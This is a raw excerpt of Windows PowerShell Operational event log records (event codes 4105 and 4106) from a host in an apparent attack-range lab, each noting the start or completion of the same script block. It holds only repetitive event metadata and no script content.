ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473089
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473088
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473087
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473086
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473085
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473084
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473083
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473082
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473081
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473080
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473079
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473078
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473077
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473076
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473075
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473074
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473073
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473072
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473071
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473070
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473069
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473068
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473067
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473066
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473065
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473064
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473063
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473062
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473061
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473060
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473059
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473058
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473057
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473056
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473055
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473054
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473053
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473052
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473051
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473050
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473049
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473048
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473047
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473046
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473045
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473044
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473043
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473042
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473041
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473040
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473039
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473038
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473037
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473036
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473035
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
